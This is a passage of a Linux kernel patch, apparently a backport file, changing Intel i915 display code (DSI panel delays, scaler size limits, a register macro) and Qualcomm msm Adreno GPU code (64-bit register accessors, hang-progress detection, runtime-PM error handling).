+index dd64b93c78e55..8219310025de5 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -1210,7 +1210,7 @@ static void gen11_dsi_powerup_panel(struct intel_encoder *encoder)
+ 
+ 	/* panel power on related mipi dsi vbt sequences */
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_POWER_ON);
+-	intel_dsi_msleep(intel_dsi, intel_dsi->panel_on_delay);
++	msleep(intel_dsi->panel_on_delay);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DEASSERT_RESET);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_INIT_OTP);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DISPLAY_ON);
+diff --git a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+index 2cbc1292ab382..f102c13cb9590 100644
+--- a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
++++ b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+@@ -762,17 +762,6 @@ void intel_dsi_vbt_exec_sequence(struct intel_dsi *intel_dsi,
+ 		gpiod_set_value_cansleep(intel_dsi->gpio_backlight, 0);
+ }
+ 
+-void intel_dsi_msleep(struct intel_dsi *intel_dsi, int msec)
+-{
+-	struct intel_connector *connector = intel_dsi->attached_connector;
+-
+-	/* For v3 VBTs in vid-mode the delays are part of the VBT sequences */
+-	if (is_vid_mode(intel_dsi) && connector->panel.vbt.dsi.seq_version >= 3)
+-		return;
+-
+-	msleep(msec);
+-}
+-
+ void intel_dsi_log_params(struct intel_dsi *intel_dsi)
+ {
+ 	struct drm_i915_private *i915 = to_i915(intel_dsi->base.base.dev);
+diff --git a/drivers/gpu/drm/i915/display/intel_dsi_vbt.h b/drivers/gpu/drm/i915/display/intel_dsi_vbt.h
+index dc642c1fe7efd..468d873fab1ae 100644
+--- a/drivers/gpu/drm/i915/display/intel_dsi_vbt.h
++++ b/drivers/gpu/drm/i915/display/intel_dsi_vbt.h
+@@ -16,7 +16,6 @@ void intel_dsi_vbt_gpio_init(struct intel_dsi *intel_dsi, bool panel_is_on);
+ void intel_dsi_vbt_gpio_cleanup(struct intel_dsi *intel_dsi);
+ void intel_dsi_vbt_exec_sequence(struct intel_dsi *intel_dsi,
+ 				 enum mipi_seq seq_id);
+-void intel_dsi_msleep(struct intel_dsi *intel_dsi, int msec);
+ void intel_dsi_log_params(struct intel_dsi *intel_dsi);
+ 
+ #endif /* __INTEL_DSI_VBT_H__ */
+diff --git a/drivers/gpu/drm/i915/display/skl_scaler.c b/drivers/gpu/drm/i915/display/skl_scaler.c
+index 4092679be21ec..90f42f63128ec 100644
+--- a/drivers/gpu/drm/i915/display/skl_scaler.c
++++ b/drivers/gpu/drm/i915/display/skl_scaler.c
+@@ -85,6 +85,10 @@ static u16 skl_scaler_calc_phase(int sub, int scale, bool chroma_cosited)
+ #define ICL_MAX_SRC_H 4096
+ #define ICL_MAX_DST_W 5120
+ #define ICL_MAX_DST_H 4096
++#define MTL_MAX_SRC_W 4096
++#define MTL_MAX_SRC_H 8192
++#define MTL_MAX_DST_W 8192
++#define MTL_MAX_DST_H 8192
+ #define SKL_MIN_YUV_420_SRC_W 16
+ #define SKL_MIN_YUV_420_SRC_H 16
+ 
+@@ -101,6 +105,10 @@ skl_update_scaler(struct intel_crtc_state *crtc_state, bool force_detach,
+ 	struct drm_i915_private *dev_priv = to_i915(crtc->base.dev);
+ 	const struct drm_display_mode *adjusted_mode =
+ 		&crtc_state->hw.adjusted_mode;
++	int pipe_src_w = drm_rect_width(&crtc_state->pipe_src);
++	int pipe_src_h = drm_rect_height(&crtc_state->pipe_src);
++	int min_src_w, min_src_h, min_dst_w, min_dst_h;
++	int max_src_w, max_src_h, max_dst_w, max_dst_h;
+ 
+ 	/*
+ 	 * Src coordinates are already rotated by 270 degrees for
+@@ -155,15 +163,33 @@ skl_update_scaler(struct intel_crtc_state *crtc_state, bool force_detach,
+ 		return -EINVAL;
+ 	}
+ 
++	min_src_w = SKL_MIN_SRC_W;
++	min_src_h = SKL_MIN_SRC_H;
++	min_dst_w = SKL_MIN_DST_W;
++	min_dst_h = SKL_MIN_DST_H;
++
++	if (DISPLAY_VER(dev_priv) < 11) {
++		max_src_w = SKL_MAX_SRC_W;
++		max_src_h = SKL_MAX_SRC_H;
++		max_dst_w = SKL_MAX_DST_W;
++		max_dst_h = SKL_MAX_DST_H;
++	} else if (DISPLAY_VER(dev_priv) < 14) {
++		max_src_w = ICL_MAX_SRC_W;
++		max_src_h = ICL_MAX_SRC_H;
++		max_dst_w = ICL_MAX_DST_W;
++		max_dst_h = ICL_MAX_DST_H;
++	} else {
++		max_src_w = MTL_MAX_SRC_W;
++		max_src_h = MTL_MAX_SRC_H;
++		max_dst_w = MTL_MAX_DST_W;
++		max_dst_h = MTL_MAX_DST_H;
++	}
++
+ 	/* range checks */
+-	if (src_w < SKL_MIN_SRC_W || src_h < SKL_MIN_SRC_H ||
+-	    dst_w < SKL_MIN_DST_W || dst_h < SKL_MIN_DST_H ||
+-	    (DISPLAY_VER(dev_priv) >= 11 &&
+-	     (src_w > ICL_MAX_SRC_W || src_h > ICL_MAX_SRC_H ||
+-	      dst_w > ICL_MAX_DST_W || dst_h > ICL_MAX_DST_H)) ||
+-	    (DISPLAY_VER(dev_priv) < 11 &&
+-	     (src_w > SKL_MAX_SRC_W || src_h > SKL_MAX_SRC_H ||
+-	      dst_w > SKL_MAX_DST_W || dst_h > SKL_MAX_DST_H)))	{
++	if (src_w < min_src_w || src_h < min_src_h ||
++	    dst_w < min_dst_w || dst_h < min_dst_h ||
++	    src_w > max_src_w || src_h > max_src_h ||
++	    dst_w > max_dst_w || dst_h > max_dst_h) {
+ 		drm_dbg_kms(&dev_priv->drm,
+ 			    "scaler_user index %u.%u: src %ux%u dst %ux%u "
+ 			    "size is out of scaler range\n",
+@@ -172,6 +198,21 @@ skl_update_scaler(struct intel_crtc_state *crtc_state, bool force_detach,
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * The pipe scaler does not use all the bits of PIPESRC, at least
++	 * on the earlier platforms. So even when we're scaling a plane
++	 * the *pipe* source size must not be too large. For simplicity
++	 * we assume the limits match the scaler source size limits. Might
++	 * not be 100% accurate on all platforms, but good enough for now.
++	 */
++	if (pipe_src_w > max_src_w || pipe_src_h > max_src_h) {
++		drm_dbg_kms(&dev_priv->drm,
++			    "scaler_user index %u.%u: pipe src size %ux%u "
++			    "is out of scaler range\n",
++			    crtc->pipe, scaler_user, pipe_src_w, pipe_src_h);
++		return -EINVAL;
++	}
++
+ 	/* mark this plane as a scaler user in crtc_state */
+ 	scaler_state->scaler_users |= (1 << scaler_user);
+ 	drm_dbg_kms(&dev_priv->drm, "scaler_user index %u.%u: "
+diff --git a/drivers/gpu/drm/i915/display/vlv_dsi.c b/drivers/gpu/drm/i915/display/vlv_dsi.c
+index 90e3e41095b34..00c80f29ad999 100644
+--- a/drivers/gpu/drm/i915/display/vlv_dsi.c
++++ b/drivers/gpu/drm/i915/display/vlv_dsi.c
+@@ -782,7 +782,6 @@ static void intel_dsi_pre_enable(struct intel_atomic_state *state,
+ {
+ 	struct intel_dsi *intel_dsi = enc_to_intel_dsi(encoder);
+ 	struct intel_crtc *crtc = to_intel_crtc(pipe_config->uapi.crtc);
+-	struct intel_connector *connector = to_intel_connector(conn_state->connector);
+ 	struct drm_i915_private *dev_priv = to_i915(crtc->base.dev);
+ 	enum pipe pipe = crtc->pipe;
+ 	enum port port;
+@@ -830,21 +829,10 @@ static void intel_dsi_pre_enable(struct intel_atomic_state *state,
+ 	if (!IS_GEMINILAKE(dev_priv))
+ 		intel_dsi_prepare(encoder, pipe_config);
+ 
++	/* Give the panel time to power-on and then deassert its reset */
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_POWER_ON);
+-
+-	/*
+-	 * Give the panel time to power-on and then deassert its reset.
+-	 * Depending on the VBT MIPI sequences version the deassert-seq
+-	 * may contain the necessary delay, intel_dsi_msleep() will skip
+-	 * the delay in that case. If there is no deassert-seq, then an
+-	 * unconditional msleep is used to give the panel time to power-on.
+-	 */
+-	if (connector->panel.vbt.dsi.sequence[MIPI_SEQ_DEASSERT_RESET]) {
+-		intel_dsi_msleep(intel_dsi, intel_dsi->panel_on_delay);
+-		intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DEASSERT_RESET);
+-	} else {
+-		msleep(intel_dsi->panel_on_delay);
+-	}
++	msleep(intel_dsi->panel_on_delay);
++	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DEASSERT_RESET);
+ 
+ 	if (IS_GEMINILAKE(dev_priv)) {
+ 		glk_cold_boot = glk_dsi_enable_io(encoder);
+@@ -878,7 +866,7 @@ static void intel_dsi_pre_enable(struct intel_atomic_state *state,
+ 		msleep(20); /* XXX */
+ 		for_each_dsi_port(port, intel_dsi->ports)
+ 			dpi_send_cmd(intel_dsi, TURN_ON, false, port);
+-		intel_dsi_msleep(intel_dsi, 100);
++		msleep(100);
+ 
+ 		intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DISPLAY_ON);
+ 
+@@ -1006,7 +994,7 @@ static void intel_dsi_post_disable(struct intel_atomic_state *state,
+ 	/* Assert reset */
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_ASSERT_RESET);
+ 
+-	intel_dsi_msleep(intel_dsi, intel_dsi->panel_off_delay);
++	msleep(intel_dsi->panel_off_delay);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_POWER_OFF);
+ 
+ 	intel_dsi->panel_power_off_time = ktime_get_boottime();
+diff --git a/drivers/gpu/drm/i915/i915_pci.c b/drivers/gpu/drm/i915/i915_pci.c
+index fe4f279aaeb3e..a2efc0b9d50c8 100644
+--- a/drivers/gpu/drm/i915/i915_pci.c
++++ b/drivers/gpu/drm/i915/i915_pci.c
+@@ -1133,6 +1133,8 @@ static const struct intel_gt_definition xelpmp_extra_gt[] = {
+ static const struct intel_device_info mtl_info = {
+ 	XE_HP_FEATURES,
+ 	XE_LPDP_FEATURES,
++	.__runtime.cpu_transcoder_mask = BIT(TRANSCODER_A) | BIT(TRANSCODER_B) |
++			       BIT(TRANSCODER_C) | BIT(TRANSCODER_D),
+ 	/*
+ 	 * Real graphics IP version will be obtained from hardware GMD_ID
+ 	 * register.  Value provided here is just for sanity checking.
+diff --git a/drivers/gpu/drm/i915/i915_reg.h b/drivers/gpu/drm/i915/i915_reg.h
+index 2372bfa04aa87..25015996f627a 100644
+--- a/drivers/gpu/drm/i915/i915_reg.h
++++ b/drivers/gpu/drm/i915/i915_reg.h
+@@ -7840,8 +7840,8 @@ enum skl_power_gate {
+ 
+ #define _PLANE_CSC_RY_GY_1(pipe)	_PIPE(pipe, _PLANE_CSC_RY_GY_1_A, \
+ 					      _PLANE_CSC_RY_GY_1_B)
+-#define _PLANE_CSC_RY_GY_2(pipe)	_PIPE(pipe, _PLANE_INPUT_CSC_RY_GY_2_A, \
+-					      _PLANE_INPUT_CSC_RY_GY_2_B)
++#define _PLANE_CSC_RY_GY_2(pipe)	_PIPE(pipe, _PLANE_CSC_RY_GY_2_A, \
++					      _PLANE_CSC_RY_GY_2_B)
+ #define PLANE_CSC_COEFF(pipe, plane, index)	_MMIO_PLANE(plane, \
+ 							    _PLANE_CSC_RY_GY_1(pipe) +  (index) * 4, \
+ 							    _PLANE_CSC_RY_GY_2(pipe) + (index) * 4)
+diff --git a/drivers/gpu/drm/msm/adreno/a4xx_gpu.c b/drivers/gpu/drm/msm/adreno/a4xx_gpu.c
+index 7cb8d9849c073..a10feb8a4194a 100644
+--- a/drivers/gpu/drm/msm/adreno/a4xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a4xx_gpu.c
+@@ -606,8 +606,7 @@ static int a4xx_pm_suspend(struct msm_gpu *gpu) {
+ 
+ static int a4xx_get_timestamp(struct msm_gpu *gpu, uint64_t *value)
+ {
+-	*value = gpu_read64(gpu, REG_A4XX_RBBM_PERFCTR_CP_0_LO,
+-		REG_A4XX_RBBM_PERFCTR_CP_0_HI);
++	*value = gpu_read64(gpu, REG_A4XX_RBBM_PERFCTR_CP_0_LO);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 02ff306f96f42..24feae285ccd6 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -605,11 +605,9 @@ static int a5xx_ucode_init(struct msm_gpu *gpu)
+ 		a5xx_ucode_check_version(a5xx_gpu, a5xx_gpu->pfp_bo);
+ 	}
+ 
+-	gpu_write64(gpu, REG_A5XX_CP_ME_INSTR_BASE_LO,
+-		REG_A5XX_CP_ME_INSTR_BASE_HI, a5xx_gpu->pm4_iova);
++	gpu_write64(gpu, REG_A5XX_CP_ME_INSTR_BASE_LO, a5xx_gpu->pm4_iova);
+ 
+-	gpu_write64(gpu, REG_A5XX_CP_PFP_INSTR_BASE_LO,
+-		REG_A5XX_CP_PFP_INSTR_BASE_HI, a5xx_gpu->pfp_iova);
++	gpu_write64(gpu, REG_A5XX_CP_PFP_INSTR_BASE_LO, a5xx_gpu->pfp_iova);
+ 
+ 	return 0;
+ }
+@@ -868,8 +866,7 @@ static int a5xx_hw_init(struct msm_gpu *gpu)
+ 	 * memory rendering at this point in time and we don't want to block off
+ 	 * part of the virtual memory space.
+ 	 */
+-	gpu_write64(gpu, REG_A5XX_RBBM_SECVID_TSB_TRUSTED_BASE_LO,
+-		REG_A5XX_RBBM_SECVID_TSB_TRUSTED_BASE_HI, 0x00000000);
++	gpu_write64(gpu, REG_A5XX_RBBM_SECVID_TSB_TRUSTED_BASE_LO, 0x00000000);
+ 	gpu_write(gpu, REG_A5XX_RBBM_SECVID_TSB_TRUSTED_SIZE, 0x00000000);
+ 
+ 	/* Put the GPU into 64 bit by default */
+@@ -908,8 +905,7 @@ static int a5xx_hw_init(struct msm_gpu *gpu)
+ 		return ret;
+ 
+ 	/* Set the ringbuffer address */
+-	gpu_write64(gpu, REG_A5XX_CP_RB_BASE, REG_A5XX_CP_RB_BASE_HI,
+-		gpu->rb[0]->iova);
++	gpu_write64(gpu, REG_A5XX_CP_RB_BASE, gpu->rb[0]->iova);
+ 
+ 	/*
+ 	 * If the microcode supports the WHERE_AM_I opcode then we can use that
+@@ -936,7 +932,7 @@ static int a5xx_hw_init(struct msm_gpu *gpu)
+ 		}
+ 
+ 		gpu_write64(gpu, REG_A5XX_CP_RB_RPTR_ADDR,
+-			REG_A5XX_CP_RB_RPTR_ADDR_HI, shadowptr(a5xx_gpu, gpu->rb[0]));
++			    shadowptr(a5xx_gpu, gpu->rb[0]));
+ 	} else if (gpu->nr_rings > 1) {
+ 		/* Disable preemption if WHERE_AM_I isn't available */
+ 		a5xx_preempt_fini(gpu);
+@@ -1239,9 +1235,9 @@ static void a5xx_fault_detect_irq(struct msm_gpu *gpu)
+ 		gpu_read(gpu, REG_A5XX_RBBM_STATUS),
+ 		gpu_read(gpu, REG_A5XX_CP_RB_RPTR),
+ 		gpu_read(gpu, REG_A5XX_CP_RB_WPTR),
+-		gpu_read64(gpu, REG_A5XX_CP_IB1_BASE, REG_A5XX_CP_IB1_BASE_HI),
++		gpu_read64(gpu, REG_A5XX_CP_IB1_BASE),
+ 		gpu_read(gpu, REG_A5XX_CP_IB1_BUFSZ),
+-		gpu_read64(gpu, REG_A5XX_CP_IB2_BASE, REG_A5XX_CP_IB2_BASE_HI),
++		gpu_read64(gpu, REG_A5XX_CP_IB2_BASE),
+ 		gpu_read(gpu, REG_A5XX_CP_IB2_BUFSZ));
+ 
+ 	/* Turn off the hangcheck timer to keep it from bothering us */
+@@ -1427,8 +1423,7 @@ static int a5xx_pm_suspend(struct msm_gpu *gpu)
+ 
+ static int a5xx_get_timestamp(struct msm_gpu *gpu, uint64_t *value)
+ {
+-	*value = gpu_read64(gpu, REG_A5XX_RBBM_ALWAYSON_COUNTER_LO,
+-		REG_A5XX_RBBM_ALWAYSON_COUNTER_HI);
++	*value = gpu_read64(gpu, REG_A5XX_RBBM_ALWAYSON_COUNTER_LO);
+ 
+ 	return 0;
+ }
+@@ -1465,8 +1460,7 @@ static int a5xx_crashdumper_run(struct msm_gpu *gpu,
+ 	if (IS_ERR_OR_NULL(dumper->ptr))
+ 		return -EINVAL;
+ 
+-	gpu_write64(gpu, REG_A5XX_CP_CRASH_SCRIPT_BASE_LO,
+-		REG_A5XX_CP_CRASH_SCRIPT_BASE_HI, dumper->iova);
++	gpu_write64(gpu, REG_A5XX_CP_CRASH_SCRIPT_BASE_LO, dumper->iova);
+ 
+ 	gpu_write(gpu, REG_A5XX_CP_CRASH_DUMP_CNTL, 1);
+ 
+@@ -1666,8 +1660,7 @@ static u64 a5xx_gpu_busy(struct msm_gpu *gpu, unsigned long *out_sample_rate)
+ {
+ 	u64 busy_cycles;
+ 
+-	busy_cycles = gpu_read64(gpu, REG_A5XX_RBBM_PERFCTR_RBBM_0_LO,
+-			REG_A5XX_RBBM_PERFCTR_RBBM_0_HI);
++	busy_cycles = gpu_read64(gpu, REG_A5XX_RBBM_PERFCTR_RBBM_0_LO);
+ 	*out_sample_rate = clk_get_rate(gpu->core_clk);
+ 
+ 	return busy_cycles;
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_preempt.c b/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
+index e0eef47dae632..f58dd564d122b 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
+@@ -137,7 +137,6 @@ void a5xx_preempt_trigger(struct msm_gpu *gpu)
+ 
+ 	/* Set the address of the incoming preemption record */
+ 	gpu_write64(gpu, REG_A5XX_CP_CONTEXT_SWITCH_RESTORE_ADDR_LO,
+-		REG_A5XX_CP_CONTEXT_SWITCH_RESTORE_ADDR_HI,
+ 		a5xx_gpu->preempt_iova[ring->id]);
+ 
+ 	a5xx_gpu->next_ring = ring;
+@@ -212,8 +211,7 @@ void a5xx_preempt_hw_init(struct msm_gpu *gpu)
+ 	}
+ 
+ 	/* Write a 0 to signal that we aren't switching pagetables */
+-	gpu_write64(gpu, REG_A5XX_CP_CONTEXT_SWITCH_SMMU_INFO_LO,
+-		REG_A5XX_CP_CONTEXT_SWITCH_SMMU_INFO_HI, 0);
++	gpu_write64(gpu, REG_A5XX_CP_CONTEXT_SWITCH_SMMU_INFO_LO, 0);
+ 
+ 	/* Reset the preemption state */
+ 	set_preempt_state(a5xx_gpu, PREEMPT_NONE);
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+index 9d7fc44c1e2a9..95e73eddc5e91 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+@@ -247,8 +247,7 @@ static void a6xx_submit(struct msm_gpu *gpu, struct msm_gem_submit *submit)
+ 	OUT_RING(ring, submit->seqno);
+ 
+ 	trace_msm_gpu_submit_flush(submit,
+-		gpu_read64(gpu, REG_A6XX_CP_ALWAYS_ON_COUNTER_LO,
+-			REG_A6XX_CP_ALWAYS_ON_COUNTER_HI));
++		gpu_read64(gpu, REG_A6XX_CP_ALWAYS_ON_COUNTER_LO));
+ 
+ 	a6xx_flush(gpu, ring);
+ }
+@@ -947,8 +946,7 @@ static int a6xx_ucode_init(struct msm_gpu *gpu)
+ 		}
+ 	}
+ 
+-	gpu_write64(gpu, REG_A6XX_CP_SQE_INSTR_BASE,
+-		REG_A6XX_CP_SQE_INSTR_BASE+1, a6xx_gpu->sqe_iova);
++	gpu_write64(gpu, REG_A6XX_CP_SQE_INSTR_BASE, a6xx_gpu->sqe_iova);
+ 
+ 	return 0;
+ }
+@@ -999,8 +997,7 @@ static int hw_init(struct msm_gpu *gpu)
+ 	 * memory rendering at this point in time and we don't want to block off
+ 	 * part of the virtual memory space.
+ 	 */
+-	gpu_write64(gpu, REG_A6XX_RBBM_SECVID_TSB_TRUSTED_BASE_LO,
+-		REG_A6XX_RBBM_SECVID_TSB_TRUSTED_BASE_HI, 0x00000000);
++	gpu_write64(gpu, REG_A6XX_RBBM_SECVID_TSB_TRUSTED_BASE_LO, 0x00000000);
+ 	gpu_write(gpu, REG_A6XX_RBBM_SECVID_TSB_TRUSTED_SIZE, 0x00000000);
+ 
+ 	/* Turn on 64 bit addressing for all blocks */
+@@ -1049,11 +1046,9 @@ static int hw_init(struct msm_gpu *gpu)
+ 
+ 	if (!adreno_is_a650_family(adreno_gpu)) {
+ 		/* Set the GMEM VA range [0x100000:0x100000 + gpu->gmem - 1] */
+-		gpu_write64(gpu, REG_A6XX_UCHE_GMEM_RANGE_MIN_LO,
+-			REG_A6XX_UCHE_GMEM_RANGE_MIN_HI, 0x00100000);
++		gpu_write64(gpu, REG_A6XX_UCHE_GMEM_RANGE_MIN_LO, 0x00100000);
+ 
+ 		gpu_write64(gpu, REG_A6XX_UCHE_GMEM_RANGE_MAX_LO,
+-			REG_A6XX_UCHE_GMEM_RANGE_MAX_HI,
+ 			0x00100000 + adreno_gpu->gmem - 1);
+ 	}
+ 
+@@ -1145,8 +1140,7 @@ static int hw_init(struct msm_gpu *gpu)
+ 		goto out;
+ 
+ 	/* Set the ringbuffer address */
+-	gpu_write64(gpu, REG_A6XX_CP_RB_BASE, REG_A6XX_CP_RB_BASE_HI,
+-		gpu->rb[0]->iova);
++	gpu_write64(gpu, REG_A6XX_CP_RB_BASE, gpu->rb[0]->iova);
+ 
+ 	/* Targets that support extended APRIV can use the RPTR shadow from
+ 	 * hardware but all the other ones need to disable the feature. Targets
+@@ -1178,7 +1172,6 @@ static int hw_init(struct msm_gpu *gpu)
+ 		}
+ 
+ 		gpu_write64(gpu, REG_A6XX_CP_RB_RPTR_ADDR_LO,
+-			REG_A6XX_CP_RB_RPTR_ADDR_HI,
+ 			shadowptr(a6xx_gpu, gpu->rb[0]));
+ 	}
+ 
+@@ -1506,9 +1499,9 @@ static void a6xx_fault_detect_irq(struct msm_gpu *gpu)
+ 		gpu_read(gpu, REG_A6XX_RBBM_STATUS),
+ 		gpu_read(gpu, REG_A6XX_CP_RB_RPTR),
+ 		gpu_read(gpu, REG_A6XX_CP_RB_WPTR),
+-		gpu_read64(gpu, REG_A6XX_CP_IB1_BASE, REG_A6XX_CP_IB1_BASE_HI),
++		gpu_read64(gpu, REG_A6XX_CP_IB1_BASE),
+ 		gpu_read(gpu, REG_A6XX_CP_IB1_REM_SIZE),
+-		gpu_read64(gpu, REG_A6XX_CP_IB2_BASE, REG_A6XX_CP_IB2_BASE_HI),
++		gpu_read64(gpu, REG_A6XX_CP_IB2_BASE),
+ 		gpu_read(gpu, REG_A6XX_CP_IB2_REM_SIZE));
+ 
+ 	/* Turn off the hangcheck timer to keep it from bothering us */
+@@ -1719,8 +1712,7 @@ static int a6xx_get_timestamp(struct msm_gpu *gpu, uint64_t *value)
+ 	/* Force the GPU power on so we can read this register */
+ 	a6xx_gmu_set_oob(&a6xx_gpu->gmu, GMU_OOB_PERFCOUNTER_SET);
+ 
+-	*value = gpu_read64(gpu, REG_A6XX_CP_ALWAYS_ON_COUNTER_LO,
+-			    REG_A6XX_CP_ALWAYS_ON_COUNTER_HI);
++	*value = gpu_read64(gpu, REG_A6XX_CP_ALWAYS_ON_COUNTER_LO);
+ 
+ 	a6xx_gmu_clear_oob(&a6xx_gpu->gmu, GMU_OOB_PERFCOUNTER_SET);
+ 
+@@ -1858,6 +1850,39 @@ static uint32_t a6xx_get_rptr(struct msm_gpu *gpu, struct msm_ringbuffer *ring)
+ 	return ring->memptrs->rptr = gpu_read(gpu, REG_A6XX_CP_RB_RPTR);
+ }
+ 
++static bool a6xx_progress(struct msm_gpu *gpu, struct msm_ringbuffer *ring)
++{
++	struct msm_cp_state cp_state = {
++		.ib1_base = gpu_read64(gpu, REG_A6XX_CP_IB1_BASE),
++		.ib2_base = gpu_read64(gpu, REG_A6XX_CP_IB2_BASE),
++		.ib1_rem  = gpu_read(gpu, REG_A6XX_CP_IB1_REM_SIZE),
++		.ib2_rem  = gpu_read(gpu, REG_A6XX_CP_IB2_REM_SIZE),
++	};
++	bool progress;
++
++	/*
++	 * Adjust the remaining data to account for what has already been
++	 * fetched from memory, but not yet consumed by the SQE.
++	 *
++	 * This is not *technically* correct; the amount buffered could
++	 * exceed the IB size due to hw prefetching ahead, but:
++	 *
++	 * (1) We aren't trying to find the exact position, just whether
++	 *     progress has been made
++	 * (2) The CP_REG_TO_MEM at the end of a submit should be enough
++	 *     to prevent prefetching into an unrelated submit.  (And
++	 *     either way, at some point the ROQ will be full.)
++	 */
++	cp_state.ib1_rem += gpu_read(gpu, REG_A6XX_CP_CSQ_IB1_STAT) >> 16;
++	cp_state.ib2_rem += gpu_read(gpu, REG_A6XX_CP_CSQ_IB2_STAT) >> 16;
++
++	progress = !!memcmp(&cp_state, &ring->last_cp_state, sizeof(cp_state));
++
++	ring->last_cp_state = cp_state;
++
++	return progress;
++}
++
+ static u32 a618_get_speed_bin(u32 fuse)
+ {
+ 	if (fuse == 0)
+@@ -1974,6 +1999,7 @@ static const struct adreno_gpu_funcs funcs = {
+ 		.create_address_space = a6xx_create_address_space,
+ 		.create_private_address_space = a6xx_create_private_address_space,
+ 		.get_rptr = a6xx_get_rptr,
++		.progress = a6xx_progress,
+ 	},
+ 	.get_timestamp = a6xx_get_timestamp,
+ };
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.c b/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.c
+index a5c3d1ed255a6..a023d5f962dce 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.c
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.c
+@@ -147,8 +147,7 @@ static int a6xx_crashdumper_run(struct msm_gpu *gpu,
+ 	/* Make sure all pending memory writes are posted */
+ 	wmb();
+ 
+-	gpu_write64(gpu, REG_A6XX_CP_CRASH_SCRIPT_BASE_LO,
+-		REG_A6XX_CP_CRASH_SCRIPT_BASE_HI, dumper->iova);
++	gpu_write64(gpu, REG_A6XX_CP_CRASH_SCRIPT_BASE_LO, dumper->iova);
+ 
+ 	gpu_write(gpu, REG_A6XX_CP_CRASH_DUMP_CNTL, 1);
+ 
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_device.c b/drivers/gpu/drm/msm/adreno/adreno_device.c
+index cd009d56d35d5..ed1e0c650bb1a 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_device.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_device.c
+@@ -440,20 +440,21 @@ struct msm_gpu *adreno_load_gpu(struct drm_device *dev)
+ 
+ 	ret = pm_runtime_get_sync(&pdev->dev);
+ 	if (ret < 0) {
+-		pm_runtime_put_sync(&pdev->dev);
++		pm_runtime_put_noidle(&pdev->dev);
+ 		DRM_DEV_ERROR(dev->dev, "Couldn't power up the GPU: %d\n", ret);
+-		return NULL;
++		goto err_disable_rpm;
+ 	}
+ 
+ 	mutex_lock(&gpu->lock);
+ 	ret = msm_gpu_hw_init(gpu);
+ 	mutex_unlock(&gpu->lock);
+-	pm_runtime_put_autosuspend(&pdev->dev);
+ 	if (ret) {
+ 		DRM_DEV_ERROR(dev->dev, "gpu hw init failed: %d\n", ret);
+-		return NULL;
++		goto err_put_rpm;
+ 	}
+ 
++	pm_runtime_put_autosuspend(&pdev->dev);
++
+ #ifdef CONFIG_DEBUG_FS
+ 	if (gpu->funcs->debugfs_init) {
+ 		gpu->funcs->debugfs_init(gpu, dev->primary);
+@@ -462,6 +463,13 @@ struct msm_gpu *adreno_load_gpu(struct drm_device *dev)
+ #endif
+ 
+ 	return gpu;
++
++err_put_rpm:
++	pm_runtime_put_sync_suspend(&pdev->dev);
++err_disable_rpm:
++	pm_runtime_disable(&pdev->dev);
++
++	return NULL;
+ }
+ 
+ static int find_chipid(struct device *dev, struct adreno_rev *rev)
+diff --git a/drivers/gpu/drm/msm/msm_drv.c b/drivers/gpu/drm/msm/msm_drv.c
+index 5a0ff112634b7..ac3d1d492a48c 100644
+--- a/drivers/gpu/drm/msm/msm_drv.c
++++ b/drivers/gpu/drm/msm/msm_drv.c
+@@ -50,6 +50,8 @@
+ #define MSM_VERSION_MINOR	9
+ #define MSM_VERSION_PATCHLEVEL	0
+ 
++static void msm_deinit_vram(struct drm_device *ddev);
++
+ static const struct drm_mode_config_funcs mode_config_funcs = {
+ 	.fb_create = msm_framebuffer_create,
+ 	.output_poll_changed = drm_fb_helper_output_poll_changed,
+@@ -241,7 +243,8 @@ static int msm_drm_uninit(struct device *dev)
+ 		msm_fbdev_free(ddev);
+ #endif
+ 
+-	msm_disp_snapshot_destroy(ddev);
++	if (kms)
++		msm_disp_snapshot_destroy(ddev);
+ 
+ 	drm_mode_config_cleanup(ddev);
+ 
+@@ -249,19 +252,16 @@ static int msm_drm_uninit(struct device *dev)
+ 		drm_bridge_remove(priv->bridges[i]);
+ 	priv->num_bridges = 0;
+ 
+-	pm_runtime_get_sync(dev);
+-	msm_irq_uninstall(ddev);
+-	pm_runtime_put_sync(dev);
++	if (kms) {
++		pm_runtime_get_sync(dev);
++		msm_irq_uninstall(ddev);
++		pm_runtime_put_sync(dev);
++	}
+ 
+ 	if (kms && kms->funcs)
